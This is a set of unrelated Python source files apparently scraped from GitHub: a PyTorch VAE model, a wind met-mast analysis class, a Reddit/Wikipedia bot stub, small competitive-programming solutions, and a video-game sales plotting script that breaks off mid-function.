class Decoder(nn.Module):
    """Convolutional VAE decoder.

    Maps a latent vector of size nz back to an image (nc, isize, isize)
    through a dense projection followed by four upsample+conv stages.
    """
    def __init__(self, nc, ndf, nz, isize):
        super(Decoder, self).__init__()
        self.ndf = ndf
        self.out_size = isize // 16
        # Dense projection from latent space to the smallest feature map.
        self.decoder_dense = nn.Sequential(
            nn.Linear(nz, ndf*8*self.out_size*self.out_size),
            nn.ReLU(True)
        )
        # Build the conv stack: (ndf*8, s, s) -> (nc, 16s, 16s).  The three
        # intermediate stages share the same upsample/conv/act/norm shape.
        stages = []
        in_ch = ndf * 8
        for out_ch in (ndf * 4, ndf * 2, ndf):
            stages += [
                nn.UpsamplingNearest2d(scale_factor=2),
                nn.Conv2d(in_ch, out_ch, 3, padding=1),
                nn.LeakyReLU(0.2, True),
                nn.BatchNorm2d(out_ch, 1.e-3),
            ]
            in_ch = out_ch
        # Final stage: no activation/norm on the output image.
        stages += [
            nn.UpsamplingNearest2d(scale_factor=2),
            nn.Conv2d(in_ch, nc, 3, padding=1),
        ]
        self.decoder_conv = nn.Sequential(*stages)
    def forward(self, input):
        """Decode latent codes into reconstructed images."""
        n = input.shape[0]
        feat = self.decoder_dense(input)
        feat = feat.view(n, self.ndf*8, self.out_size, self.out_size)
        return self.decoder_conv(feat)
class VAE(nn.Module):
    """Convolutional variational autoencoder wrapping Encoder and Decoder.

    Interface unchanged: forward / encode / decode / reparametrize / sample
    and the read-only `device` property.
    """
    def __init__(self, nc=3, ndf=32, nef=32, nz=100, isize=64, device=torch.device("cuda:0"), is_train=True):
        super(VAE, self).__init__()
        self.nz = nz
        self.isize=isize
        # Encoder / Decoder halves.
        self.encoder = Encoder(nc=nc, nef=nef, nz=nz, isize=isize, device=device)
        self.decoder = Decoder(nc=nc, ndf=ndf, nz=nz, isize=isize)
        if not is_train:
            # Freeze all weights for inference-only use.
            for param in self.encoder.parameters():
                param.requires_grad = False
            for param in self.decoder.parameters():
                param.requires_grad = False
    def forward(self, x):
        """Return (reconstruction, posterior mean, posterior log-variance)."""
        latent_z, mean, logvar = self.encoder(x)
        rec_x = self.decoder(latent_z)
        return rec_x, mean, logvar
    def encode(self, x):
        """Return a latent sample for x (mean/logvar are discarded)."""
        latent_z, _, _ = self.encoder(x)
        return latent_z
    def decode(self, z):
        """Decode latent codes z into images."""
        return self.decoder(z)
    def reparametrize(self, mu, logvar):
        """Sample z = mu + exp(logvar/2) * eps with eps ~ N(0, I).

        FIX: replaced the deprecated Variable / FloatTensor pair with
        torch.randn_like (device/dtype follow the inputs automatically).
        """
        std = logvar.mul(0.5).exp_()
        eps = torch.randn_like(std)
        return eps.mul(std).add_(mu)
    def sample(self, size):
        """Draw `size` images from the prior p(z) = N(0, I) via the decoder.

        BUGFIX: the original passed a tensor of ONES as the *log-variance*,
        which made the prior std exp(0.5) ~ 1.65 instead of 1.  A zero
        log-variance yields the intended unit-variance prior.
        """
        mu = torch.zeros((size, self.nz), device=self.device)
        logvar = torch.zeros((size, self.nz), device=self.device)
        z = self.reparametrize(mu, logvar)
        return self.decode(z)
    @property
    def device(self):
        """Device of the model parameters."""
        return next(self.parameters()).device
| szadedyurina/vae_serve | server/model.py | model.py | py | 4,930 | python | en | code | 0 | github-code | 90 |
8571526036 | # -*- coding: utf-8 -*-
'''
Site
A site import and analysis class built
with the pandas library
'''
import anemoi as an
import pandas as pd
import numpy as np
import itertools
class Site(object):
    '''Subclass of the pandas dataframe built to import and quickly analyze
    met mast data.'''
    def __init__(self, masts=None, meta_data=None, primary_mast=None):
        '''Data structure with an array of anemoi.MetMasts and a DataFrame of
        results:
        Parameters
        ----------
        masts: array of anemoi.MetMasts
        meta_data: DataFrame of analysis results
        primary_mast: string or int, default None
            Longest-term mast installed on site
        '''
        if masts is not None:
            # Collect one metadata column per mast for the summary table.
            mast_names = []
            mast_lats = []
            mast_lons = []
            mast_heights = []
            mast_primary_anos = []
            mast_primary_vanes = []
            for mast in masts:
                # Silently skips anything that is not an anemoi.MetMast.
                if isinstance(mast, an.MetMast):
                    mast_names.append(mast.name)
                    mast_lats.append(mast.lat)
                    mast_lons.append(mast.lon)
                    mast_heights.append(mast.height)
                    mast_primary_anos.append(mast.primary_ano)
                    mast_primary_vanes.append(mast.primary_vane)
            if meta_data is None:
                # Default meta_data: masts as columns, attributes as rows.
                meta_data = pd.DataFrame(columns=mast_names,
                                        index=['Lat', 'Lon', 'Height', 'PrimaryAno', 'PrimaryVane'])
                meta_data.loc['Lat', :] = mast_lats
                meta_data.loc['Lon', :] = mast_lons
                meta_data.loc['Height', :] = mast_heights
                meta_data.loc['PrimaryAno', :] = mast_primary_anos
                meta_data.loc['PrimaryVane', :] = mast_primary_vanes
                meta_data.columns.name = 'Masts'
        self.masts = masts
        self.meta_data = meta_data
    def __repr__(self):
        # Build "Site masts: a, b, c" from the masts' names.
        mast_names = 'Site masts: '
        for mast in self.masts:
            if mast_names == 'Site masts: ':
                mast_names = mast_names + ' ' + str(mast.name)
            else:
                mast_names = mast_names + ', ' + str(mast.name)
        return mast_names
    def check_has_masts(self):
        """Return True if the site has at least one mast; raise ValueError otherwise."""
        if len(self.masts) < 1:
            raise ValueError("This site doesn't seem to have any masts associated...")
        return True
    def get_mast_names(self):
        """Return the mast names (columns of meta_data); raise if there are none."""
        if not self.masts:
            raise ValueError("This site doesn't seem to have any masts associated...")
        else:
            return self.meta_data.columns
    def return_ws_corr_results_binned_by_direction(self):
        """Concatenate 10-minute directional correlation results for every ordered mast pair."""
        if self.check_has_masts():
            site_correlation_results = []
            for mast_pair in itertools.permutations(self.masts, 2):
                ref_mast = mast_pair[0]
                site_mast = mast_pair[1]
                results = an.correlate.correlate_masts_10_minute_by_direction(ref_mast=ref_mast, site_mast=site_mast)
                site_correlation_results.append(results)
            site_correlation_results = pd.concat(site_correlation_results, axis=0)
            return site_correlation_results
    def return_cross_corr_results_dataframe(self):
        """Return an empty (Ref, Site) MultiIndex frame for cross-correlation results,
        excluding self-pairs (Ref == Site)."""
        if self.check_has_masts():
            cross_corr_results_index = pd.MultiIndex.from_product([self.meta_data.columns.tolist()]*2, names=['Ref', 'Site'])
            results_cols = ['Slope', 'Offset', 'DirOffset', 'R2', 'Uncert']
            cross_corr_results_dataframe = pd.DataFrame(index=cross_corr_results_index, columns=results_cols)
            refs = cross_corr_results_dataframe.index.get_level_values(level='Ref')
            sites = cross_corr_results_dataframe.index.get_level_values(level='Site')
            cross_corr_results_dataframe = cross_corr_results_dataframe.loc[refs != sites, :]
            return cross_corr_results_dataframe
    def calculate_measured_momm(self):
        '''Calculates measured mean of monthly mean wind speed for each mast in anemoi.Site'''
        # NOTE(review): iterates `self.masts.Masts` here but `for mast in
        # self.masts` elsewhere -- confirm whether masts is a DataFrame
        # with a 'Masts' column or a plain sequence.
        if self.check_has_masts():
            for mast in self.masts.Masts:
                self.meta_data.loc['Meas MoMM', mast.name] = mast.return_momm(sensors=mast.primary_ano).iloc[0,0]
    def calculate_self_corr_results(self):
        """Fill the cross-correlation frame with ODR slope/offset/R2/uncertainty per mast pair."""
        # NOTE(review): `self.masts.loc[...]` assumes masts is a DataFrame,
        # inconsistent with list-style iteration elsewhere -- verify.
        if self.check_has_masts():
            cross_corr_results = self.return_cross_corr_results_dataframe()
            for mast_pair in cross_corr_results.index:
                ref = mast_pair[0]
                site = mast_pair[1]
                ref_mast = self.masts.loc[ref,'Masts']
                site_mast = self.masts.loc[site,'Masts']
                slope, offset, uncert, R2 = site_mast.correlate_to_reference(reference_mast=ref_mast, method='ODR')
                results_cols = ['Slope', 'Offset', 'R2', 'Uncert']
                cross_corr_results.loc[pd.IndexSlice[ref, site], results_cols] = [slope, offset, R2, uncert]
            return cross_corr_results
    def calculate_annual_shear_results(self):
        """Run the site-wide annual shear analysis and return its results."""
        if self.check_has_masts():
            shear_results = an.shear.shear_analysis_site(self.masts)
            return shear_results
    def calculate_long_term_alpha(self):
        '''Calculates measured annual alpha for each mast in anemoi.Site'''
        if self.check_has_masts():
            for mast in self.masts:
                self.meta_data.loc['Alpha', mast.name] = mast.calculate_long_term_alpha()
    def plot_monthly_valid_recovery(self):
        '''Plots monthly valid recovery for each mast in anemoi.Site'''
        if self.check_has_masts():
            for mast in self.masts:
                mast.plot_monthly_valid_recovery()
    def plot_freq_dists(self):
        '''Plots wind speed frequency distributions for each mast in anemoi.Site'''
        if self.check_has_masts():
            for mast in self.masts:
                mast.plot_freq_dist()
    def plot_wind_roses(self):
        '''Plots wind speed frequency distributions for each mast in anemoi.Site'''
        if self.check_has_masts():
            for mast in self.masts:
                mast.plot_wind_rose()
    def plot_site_masts_summary(self):
        """Print each mast's summary and plot recovery, energy roses and freq dist."""
        for mast in self.masts:
            print(mast.mast_data_summary(), mast, '\n')
            mast.plot_monthly_valid_recovery();
            mast.plot_wind_energy_roses(dir_sectors=12);
            mast.plot_freq_dist();
            # plt.show()
    def plot_ws_corr_results_binned_by_direction(self):
        """Plot wind-speed correlations by direction bin for every ordered mast pair."""
        site_correlation_results = self.return_ws_corr_results_binned_by_direction()
        dir_bins = site_correlation_results.index.get_level_values('DirBin').unique()
        for mast_pair in itertools.permutations(self.masts, 2):
            ref_mast = mast_pair[0]
            ref_mast_name = ref_mast.name
            site_mast = mast_pair[1]
            site_mast_name = site_mast.name
            ref_data = ref_mast.return_sensor_data([ref_mast.primary_ano, ref_mast.primary_vane])
            site_data = site_mast.return_sensor_data(site_mast.primary_ano)
            # Align reference and site data on their common timestamps.
            df = pd.concat([ref_data, site_data], axis=1, join='inner', keys=['Ref', 'Site']).dropna()
            df.columns = ['RefWS', 'RefDir', 'SiteWS']
            df = an.correlate.append_dir_bin(df, dir_column='RefDir')
            an.plotting.plot_ws_correlation_by_direction(df=df,
                                                        site_corr_results=site_correlation_results,
                                                        site_mast_name=site_mast_name,
                                                        ref_mast_name=ref_mast_name)
| coryjog/anemoi | anemoi/site.py | site.py | py | 7,687 | python | en | code | 19 | github-code | 90 |
13328083563 | '''
app.py
The script that runs this bot
'''
import praw
from reddit.config import REDDIT
from reddit import wikipedia
def wiki_testing():
    '''Practicing finding wikipedia links
    in a string'''
    sample = 'steins gate is pretty cool https://en.wikipedia.org/wiki/Steins;Gate_(TV_series)'
    # Print the list of wikipedia links detected in the sample text.
    print(wikipedia.get_urls(sample))
def comment_testing():
    ''' Practicing looking through reddit
    comments. Currently need to be able to look through
    replies recursively. Look in agenda.txt for more details
    '''
    submissions = REDDIT.subreddit('all').hot(limit=1)  # first 100 submissions in r/all
    shown = 0
    for submission in submissions:
        print('\n' + submission.title + '\n')
        for comment in submission.comments:
            print()
            # Stop after 15 top-level comments have been printed.
            if shown >= 15:
                break
            print(comment.body)
            shown += 1
def main():
    """Run the reddit comment demo followed by the wikipedia-link demo."""
    comment_testing()
    print()
    wiki_testing()
if __name__ == '__main__':
    # Entry point: only run the demos when executed directly, not on import.
    main()
| JJDProjects/wiki_search_bot | app.py | app.py | py | 968 | python | en | code | 1 | github-code | 90 |
# coding: utf-8
# Count how many times each word appears in one line of input.
# Split the input string on single spaces.
strlist = input().split(" ")
# Remove duplicate words, preserving first-seen order.
N = []
for x in strlist:
    if x not in N:
        N.append(x)
# Print each distinct word with its occurrence count.
for i in range(len(N)):
print(N[i],strlist.count(N[i]))
| Automa237/Python_training | str_counter.py | str_counter.py | py | 345 | python | ja | code | 1 | github-code | 90 |
n = int(input())
x = list(map(int,input().split()))
# Sorted copy: medians of the remaining elements are read off by rank.
y = sorted(x)
# For each element, print the median of the list with that element removed:
# removing a value at or below the lower middle shifts the median up a rank.
# NOTE(review): the rank arithmetic presumes N is even - confirm.
for i in x:
    if y[(n+1)//2-1] >= i:
        print(y[(n+1)//2])
    else:
print(y[(n+1)//2-1]) | Aasthaengg/IBMdataset | Python_codes/p03379/s884976672.py | s884976672.py | py | 173 | python | en | code | 0 | github-code | 90 |
# Read the two counts; all arithmetic below is modulo 1e9+7.
n,m = map(int,input().split())
mod = 10**9+7
def mod_f(i, mod=10**9+7):
    """Return i! modulo *mod* (default 1e9+7, matching the module constant).

    mod_f(0) == 1.  FIX: the original loop reused the parameter `i` as its
    own loop variable; a separate variable is used instead.  The modulus is
    now a defaulted parameter (backward compatible) for general use.
    """
    ans = 1
    for k in range(1, i + 1):
        ans = ans * k % mod
    return ans
# Arrangements of n items of one kind and m of another in a strictly
# alternating row: impossible unless the counts differ by at most 1.
if abs(n-m) > 1:
    print(0)
elif n == m:
    # Either kind may start the row, hence the extra factor of 2.
    print((mod_f(n)*mod_f(m)*2)%mod)
else:
print((mod_f(n)*mod_f(m))%mod) | Aasthaengg/IBMdataset | Python_codes/p03681/s907212145.py | s907212145.py | py | 270 | python | en | code | 0 | github-code | 90 |
import matplotlib.pyplot as plt
import os.path
import csv
from matplotlib import style
# Apply the 'bmh' theme globally to every chart produced below.
style.use('bmh')
def busca_1(ano, mod, gen):
    """Average global sales per genre for games released in year *ano*.

    Parameters
    ----------
    ano : str -- release year to filter on (column 3 of vgsales.csv)
    mod : str -- "1" returns the average for genre *gen* instead of plotting
    gen : str -- genre name used when mod == "1"

    When mod != "1" the per-genre averages are appended to the user's
    history file (escrever) and bar-plotted (graphics).

    FIXES: the original repeated the same if-block twelve times (one per
    genre) and contained two no-op statements (`d(L[10])` and
    `L[10]==float(L[10])`); a single genre lookup does the same work.
    """
    from decimal import Decimal as d
    nomes = ['Action', 'Role-Playing', 'Shooter', 'Platform', 'Sports', 'Simulation',
             'Fighting', 'Misc', 'Adventure', 'Racing', 'Puzzle', 'Strategy']
    # Per-genre accumulators: sum of global sales and number of titles.
    genero = [0] * 12
    media = [0] * 12
    with open('vgsales.csv', 'r') as arq:
        lista = [linha.replace('\n', '').split(',') for linha in arq]
    for L in lista[1:]:  # skip the header row
        if L[3] == ano and L[4] in nomes:
            j = nomes.index(L[4])
            genero[j] += d(L[10])
            media[j] += 1
    # Convert sums to averages (genres with no titles stay 0).
    for i in range(12):
        if genero[i] != 0:
            genero[i] = genero[i] / media[i]
    if mod == "1":
        # Query mode: return just the requested genre's average.
        for i in range(12):
            if nomes[i] == gen:
                return genero[i]
    # --- write the history entry ---
    x = ','.join(str(nome) for nome in nomes)
    y = ','.join(str(v) for v in genero)
    h = 'busca_1,' + 'Ano:' + ano + '|' + x + '|' + y + '|' + '\n'
    escrever(h)
    # -------------------
    return (graphics(nomes, genero, ano))
def graphics(nomes,lista,ano):
    """Bar chart: average global sales (y) per genre (x) for year *ano*."""
    fig = plt.figure()
    ax1 = plt.subplot2grid((1,1), (0,0))
    x = nomes
    y = lista
    # Rotate genre labels so they do not overlap.
    for label in ax1.xaxis.get_ticklabels():
        label.set_rotation (45)
    plt.bar(x,y)
    plt.xlabel('Genero')
    plt.ylabel('Média Global')
    plt.title('Média X Gênero ano: {0}'.format(ano))
    plt.show()
#----------------------------------------BUSCA 2 ---------------------------------------------------------
def busca_2(ano,gen):
    """Top-10 publishers by number of releases for year *ano* and genre *gen*.

    Counts rows per publisher (column 5 of vgsales.csv), logs the query to
    the user's history file, then draws a horizontal bar chart.
    """
    arq = open('vgsales.csv', 'r')
    # NOTE(review): the ten blank/space keys pre-seed the dict so the
    # top-10 slice below never runs short when fewer than ten real
    # publishers match -- confirm this padding is intentional.
    dic={'':0,' ':0,'  ':0,'   ':0,'    ':0,'     ':0,
         '      ':0,'       ':0,'        ':0,'         ':0,}# names and counts
    dic1=[]# counts, sorted descending
    dic2=[]# publisher names matched to the sorted counts
    lista=[]
    for linha in arq:
        linha=linha.replace('\n', '')
        lista.append(linha.split(','))
    arq.close()
    for i in range (1,len(lista)):
        L=lista[i]
        if L[4]==gen and L[3]== ano:
            if L[5] in dic: # publisher already has a key
                dic[L[5]]+= 1
            else: # first release seen for this publisher
                dic.update({L[5]:1})
    dic1= sorted(dic.values())
    dic1.reverse()
    # Match each count back to its publisher; -1 marks names already
    # consumed so equal counts are not emitted twice.
    for i in dic1:# counts
        for j in dic:# names
            if dic[j] == i:
                dic2.append(j)
                dic[j]=-1
    nome=[]
    publicacoes=[]
    for i in range(10):
        nome.append(dic2[i])
        publicacoes.append(dic1[i])
    #--- write the history entry ---
    x=''
    y=''
    for i in range(len(nome)):
        if i != 0:
            x +=','
            y +=','
        x += str(nome[i])
        y += str(publicacoes[i])
    h='busca_2,'+'Ano:'+ano+',Gênero:'+gen+'|'+x+'|'+y+'|'+'\n'
    escrever(h)
    #-----------------
    return(graphics2(nome,publicacoes,ano,gen))
def graphics2(dic2,dic1,ano,gen):
    """Horizontal bar chart: publishers (y) vs publication counts (x)."""
    x = dic2
    y = dic1
    plt.barh(x,y)
    plt.xlabel('Genero')
    plt.ylabel('Empresas')
    plt.title('Empresas X Publicações ano {0} Genero {1}'.format(ano,gen))
    # Widen the left margin so long publisher names fit on screen.
    plt.subplots_adjust(left = 0.22, bottom = 0.09)
    plt.show()
#-------------------------------------BUSCA 3----------------------------------
def busca_3 (regiao):
    """Top-10 platforms by average sales in one region.

    regiao -- vgsales.csv column index of the sales figure: 6=NA, 7=EU,
    8=JP, 9=Other.  The index is remapped to the region's name before the
    history entry and plot titles are built.
    """
    def pegarConsoles():
        # Collect every distinct platform name found in vgsales.csv.
        console = []
        with open ('vgsales.csv', 'r') as vendasArquivo:
            leitor_csv = csv.reader(vendasArquivo)
            for line in leitor_csv:
                if(line[2]) not in console:
                    console.append(line[2]) # add the platform
            del(console[0]) # drop the header word 'Platform'
        vendasArquivo.close()
        return console # every platform present in the data set
    with open ('vgsales.csv', 'r') as vendasArquivo:
        leitor_csv = csv.reader(vendasArquivo)
        console = pegarConsoles()
        # Parallel lists with one zero per platform.
        somatorioValorVendasConsole = [0 for k in range(len(console))]
        quantidadeDeVendasConsole = [0 for k in range(len(console))]
        mediaDeCadaConsole = [0 for k in range(len(console))]
        for line in leitor_csv: # walk every row of the file
            meuContador = 0 # platform index
            for k in console: # k is each platform in turn
                if(line[2] == k):
                    somatorioValorVendasConsole[meuContador] += float(line[regiao])
                    quantidadeDeVendasConsole[meuContador] += 1
                    break # only the first matching platform counts
                meuContador += 1 # advance to the next platform index
        meuContador = 0
        for k in console: # average per platform for the chosen region
            if(float(somatorioValorVendasConsole[meuContador]) != 0 or float(quantidadeDeVendasConsole[meuContador]) != 0):
                mediaDeCadaConsole[meuContador] = float(somatorioValorVendasConsole[meuContador]) / float(quantidadeDeVendasConsole[meuContador])
            else: # avoid dividing by zero
                mediaDeCadaConsole[meuContador] = 0
            meuContador += 1
        top10medias = []
        top10console = []
        top10med=[]
        top10con=[]
        contador = 0
        top10={}
        # Translate the column index into a region label for titles/history.
        if regiao == 6:
            regiao='NA'
        if regiao == 7:
            regiao='EU'
        if regiao == 8:
            regiao='JP'
        if regiao == 9:
            regiao='Other'
        # NOTE(review): 32 is a hard-coded platform count -- confirm it
        # still matches the data set.
        for k in range(32):
            top10medias.append(mediaDeCadaConsole[contador])
            top10con.append(console[contador])
            contador += 1
        for i in range(32):
            top10.update({top10con[i]:top10medias[i]})
        # Sort averages descending, then match names back; -1 marks
        # entries already consumed so ties are not duplicated.
        top10medias = sorted(top10.values())
        top10medias.reverse()
        for i in top10medias:# values
            for j in top10:# names
                if top10[j] == i:
                    top10console.append(j)
                    top10[j]=-1
        c = 0
        top10mediasPlot = []
        top10consolePlot = []
        for k in range(10):
            top10mediasPlot.append(top10medias[c])
            top10consolePlot.append(top10console[c])
            c += 1
    vendasArquivo.close()
    #------ write the history entry --
    x=''
    y=''
    for i in range(len(top10consolePlot)):
        if i != 0:
            x +=','
            y +=','
        x += str(top10consolePlot[i])
        y += str(top10mediasPlot[i])
    h='busca_3,'+'Região:'+regiao+'|'+x+'|'+y+'|'+'\n'
    escrever(h)
    #----------------------
    return graphics3(top10consolePlot, top10mediasPlot,regiao)
def graphics3(top10consolePlot, top10mediasPlot,regiao):
    """Scatter plot: platform (x) vs regional sales average (y)."""
    # NOTE(review): the tuple initialisations are immediately overwritten.
    x = ()
    y = ()
    x = top10consolePlot
    y = top10mediasPlot
    plt.scatter(x, y, s = 30)
    plt.grid(True)
    plt.xlabel('Plataforma:')
    plt.ylabel('Médias:')
    plt.title('Média X Plataforma,Região {0}'.format(regiao))
    plt.show()
#-------------------------------------BUSCA 4 -----------------------------------------------------------
def busca_4(gen):
    """Sales totals for genre *gen* in NA, EU, JP, Other and Global.

    The totals in *med* are handed to loop0(), which converts them to pie
    percentages, writes the history line and plots the chart.
    NOTE(review): columns 6-10 are assumed numeric -- float() will raise
    on blank fields; confirm the CSV is clean.
    """
    arq = open('vgsales.csv', 'r')
    lista = []
    L = []
    med = [0,0,0,0,0]
    regiao = ['NA', 'EU', 'JP', 'Other', 'Global']
    for linha in arq:
        linha=linha.replace('\n', '')
        lista.append(linha.split(','))
    arq.close()
    for i in range (1,len(lista)):
        L = lista[i]
        if L[4] == gen :
            med[0] += float(L[6])
            med[1] += float(L[7])
            med[2] += float(L[8])
            med[3] += float(L[9])
            med[4] += float(L[10])
    loop0(0,med,regiao,gen)
#-------Recursiva--------
def loop0(i, med, regiao, gen):
    """Recursively rescale the regional totals in *med* into pie percentages.

    Every entry is multiplied by 100 / (2 * global_total); the global entry
    (index 4) therefore always ends up at 50 (when the total is non-zero),
    i.e. half the pie.  When all five entries are scaled, hands off to
    loop1() for history logging and plotting.

    FIX: removed an unreachable graphics4() call that followed the return.
    """
    med[i] *= 100.00 / (2*med[4])
    i += 1
    if i != 5:
        return loop0(i, med, regiao, gen)
    # All five entries scaled: build the history strings from scratch.
    return loop1(0, med, gen, regiao, '', '')
def loop1(i,med,gen,regiao,x,y):
    """Recursive helper for busca_4: accumulate 'region,...' / 'value,...'
    strings, then write the history line and draw the pie chart."""
    if i != 0:
        x +=','
        y +=','
    x += str(regiao[i])
    y += str(med[i])
    i += 1
    if i != 5:
        return loop1(i,med,gen,regiao,x,y)
    h='busca_4,'+'Gênero:'+gen+'|'+x+'|'+y+'|'+'\n'
    escrever(h)
    graphics4(med,regiao,gen)
#-----------Tela
def graphics4(med,regiao,gen):
    """Pie chart of the regional percentages produced by loop0()."""
    # One fixed colour per region slice.
    cor = ['#4682B4', '#708090', '#6A5ACD', '#191970', '#ADD8E6']
    plt.pie(med, labels = regiao,
            startangle = 90,
            colors = cor,
            shadow = True,
            explode = (0, 0, 0, 0, 0),
            autopct = '%1.1f%%')
    plt.title('Região X Média,Gênero:{0}'.format(gen))
    plt.show()
#-------------------------------------BUSCA 5 ---------------------------------
def busca_5(anoA,anoB,gen,intervalo):
    """Yearly global-sales averages for genre *gen* over [anoA, anoB].

    Delegates each year to busca_1(..., mod="1", ...), which returns the
    average instead of plotting; results are logged then bar-plotted.
    NOTE(review): busca_1 falls through (returns None and plots) when
    *gen* is not in its genre list -- confirm callers validate first.
    """
    lista=[]
    anos=[]
    while anoA != anoB+1:
        x=busca_1(str(anoA),'1',gen)
        lista.append(x)
        anos.append(str(anoA))
        anoA+= 1
    #--- write the history entry --
    x=''
    y=''
    for i in range(len(lista)):
        if i != 0:
            x +=','
            y +=','
        x += str(anos[i])
        y += str(lista[i])
    h='busca_5,'+'Gênero:'+gen+',Intervalo:'+intervalo+'|'+x+'|'+y+'|'+'\n'
    escrever(h)
    #------------------
    graphics5(lista,anos,gen,intervalo)
def graphics5(lista,anos,gen,intervalo):
    """Bar chart: yearly global-sales averages (y) per year (x)."""
    fig = plt.figure()
    ax1 = plt.subplot2grid((1,1), (0,0))
    x = anos
    y = lista
    # Rotate year labels so they do not overlap.
    for label in ax1.xaxis.get_ticklabels():
        label.set_rotation (45)
    plt.bar(x,y)
    plt.ylabel('Média Global')
    plt.title('Médias globais entre {0}, Gênero: {1}'.format(intervalo,gen))
    plt.show()
#-----------------------------BUSCA 6 -----------------------------------------
def busca_6(ano, ano2, qgen):
    """Games released per year for the most popular genres in [ano, ano2].

    Builds, for each of the 12 genres (ranked by total titles over the
    interval, ties keeping list order), a per-year release-count series;
    writes a history entry and hands everything to graphics6(), which
    plots the first *qgen* series.

    FIXES vs the original:
      * the 12th genre's serialized series was built from the 11th series
        (copy-paste bug: g11 instead of g12);
      * the genre-ranking loop ran 12 identical passes over the sorted
        counts; one pass produces the same ordering.
    """
    nomes_base = ['Action', 'Role-Playing', 'Shooter', 'Platform', 'Sports', 'Simulation',
                  'Fighting', 'Misc', 'Adventure', 'Racing', 'Puzzle', 'Strategy']
    with open('vgsales.csv', 'r') as arq:
        lista = [linha.replace('\n', '').split(',') for linha in arq]
    an1, an2 = ano, ano2
    intervalo = str(an1) + '-' + str(an2)
    xano = list(range(an1, an2 + 1))
    anos_validos = {str(a) for a in xano}
    # Total titles per genre over the whole interval.
    dic = {g: 0 for g in nomes_base}
    for L in lista[1:]:  # skip the header row
        if L[4] in dic and L[3] in anos_validos:
            dic[L[4]] += 1
    # Genre names ordered by descending popularity; sorted() is stable, so
    # ties keep the nomes_base order (matching the original's behaviour).
    nomes = sorted(nomes_base, key=lambda g: -dic[g])
    # series[k][t] = titles of genre nomes[k] released in year xano[t].
    series = [[0] * len(xano) for _ in range(12)]
    for L in lista[1:]:
        if L[4] in dic and L[3] in anos_validos:
            series[nomes.index(L[4])][int(L[3]) - an1] += 1
    gnome = ','.join(nomes)
    # One comma-joined series per genre, '*'-separated -- this exact
    # format is read back by ler() and graphics6().
    game = '*'.join(','.join(str(v) for v in serie) for serie in series)
    xxx = ','.join(str(a) for a in xano)
    # --- write the history entry ---
    h = ('busca_6,Gêneros:' + str(qgen) + ',Intervalo:' + intervalo + '|' + str(gnome) +
         '|' + game + '|' + str(qgen) + '|' + xxx + '|' + str(an1) + '|' + str(an2) + '\n')
    escrever(h)
    graphics6(game, gnome, xano, qgen, an1, an2)
def graphics6(game, gnome, xano, qgen, an1, an2):
    """Plot one line per genre (the first *qgen* of up to 12) over the years.

    game  -- 12 comma-joined integer series separated by '*'
    gnome -- matching comma-joined genre names
    (both exactly as produced by busca_6 and replayed by ler)

    FIX: the original 12-branch if-chain plotted the 8th series again for
    the 10th genre (g7 instead of g9); a single loop removes the
    duplication and the bug.
    """
    # Deserialize: one int list per genre.
    series = [[int(v) for v in chunk.split(',')] for chunk in game.split('*')]
    labels = gnome.split(',')
    # Plot only the first qgen genres (capped at the 12 available series).
    for idx in range(min(int(qgen), 12)):
        plt.plot(xano, series[idx], label=labels[idx])
    plt.ylabel('Número de jogos')
    plt.xlabel('Intervalo de anos')
    plt.title('Número de jogos por gênero no ano de {0} - {1}'.format(an1, an2))
    plt.legend()
    plt.show()
#-----------------------------BUSCA 13-----------------------------------------
def busca_13(ano1, ano2, gen):
intervaloAnos = []
intervalo=str(ano1)+'-'+str(ano2)
lista = []
anos_str = []
top20_mundial = []
c = 0
ano = ano1
while ano1 <= ano2:#gera uma lista com todos os anos
intervaloAnos.append(ano1)
ano1 += 1
anos_str = str(intervaloAnos)#anos em str
with open ('vgsales.csv', 'r') as vendasArquivo:
leitor_csv = csv.reader(vendasArquivo)
for line in leitor_csv:
if (line[3] in anos_str) and (line[4] == gen):
lista.append(line)#cria uma lista com as linhas que correspondam ao genero e ao intervalo de anos
for i in range(20):
top20_mundial.append(lista[i])#da lista gerada, separa os 20 primeiros lugares
jogosTop20 = []
vendasTop20_jpsales = []
vendasTop20_eusales = []
for line in top20_mundial:
if (line[1]) in jogosTop20:
jogosTop20.append(line[1]+'..R')#append os jogos
else:
jogosTop20.append(line[1])
if (line[7]) != ' ' or 0 or '0':
vendasTop20_eusales.append(float(line[7]))#append nas vendas de eu sales
else:
vendasTop20_eusales.append(0)#append 0 se nao tiver valor algum
if (line[8]) != ' ' or 0 or '0':
vendasTop20_jpsales.append(float(line[8]))#append nas vendas jp sales
else:
vendasTop20_jpsales.append(0)
vendasArquivo.close()
#--- Gera historico--
x=''
y=''
z=''
for i in range(len(jogosTop20)):
if i != 0:
x +=','
y +=','
z +=','
x += str(jogosTop20[i])
y += str(vendasTop20_jpsales[i])
z += str(vendasTop20_eusales[i])
h='busca_13,'+'Gênero:'+gen+',Intervalo:'+intervalo+'|'+x+'|'+y+'|'+z+'|'+'\n'
escrever(h)
#------------------
return (graphics13(jogosTop20, vendasTop20_jpsales, vendasTop20_eusales,intervalo, gen))
def graphics13(jogosTop20, vendasTop20_jpsales, vendasTop20_eusales,intervalo, gen):
    """Scatter: JP (blue) and EU (red) sales per top-20 game title."""
    plt.scatter(vendasTop20_jpsales, jogosTop20, color = 'b', label = 'Vendas no Japão')
    plt.scatter(vendasTop20_eusales, jogosTop20, color = 'r', label = 'Vendas na Europa')
    plt.xlabel('Vendas nas regiões EU e JP')
    plt.ylabel('Top 20 jogos ')
    plt.title('Top 20 jogos entre {0},Gênero: {1}'.format(intervalo, gen))
    plt.grid(True)
    # Wide left margin so long game titles fit on screen.
    plt.subplots_adjust(left = 0.39, right = 0.97)
    plt.legend()
    plt.show()
#------------------------------------------------------------------------------------------------------------
def ler(arquivo,ano,gen,intervalo,reg,busca):
    """Look up a previous query in the user's history file and replay its plot.

    arquivo -- exact history-line prefix to match (e.g. 'busca_1,Ano:2006')
    busca   -- which busca_N produced the line; selects the graphics_N replay
    Returns 1 when a cached entry was found and replotted, 0 otherwise.
    NOTE(review): depends on the global `user` and on the exact
    '|'/','-separated format written by escrever() in each busca_N; the
    file is also closed inside the loop, so a matched line whose busca
    value hits no branch would leave the loop iterating a closed file.
    """
    A=[]
    x=[]
    y=[]
    yy=[]
    z=[]
    zz=[]
    arq = open( user +'.txt', 'r')
    for linha in arq:
        A = linha.split('|')
        if A[0]== arquivo and busca != 6:
            # Field 1: labels; field 2: numeric values.
            x = A[1].split(',')
            yy = A[2].split(',')
            for i in range(len(yy)):
                y.append(float(yy[i]))
            arq.close()
            if busca == 1:
                graphics(x,y,ano)
                print('Você utilizou dados já pesquisados')
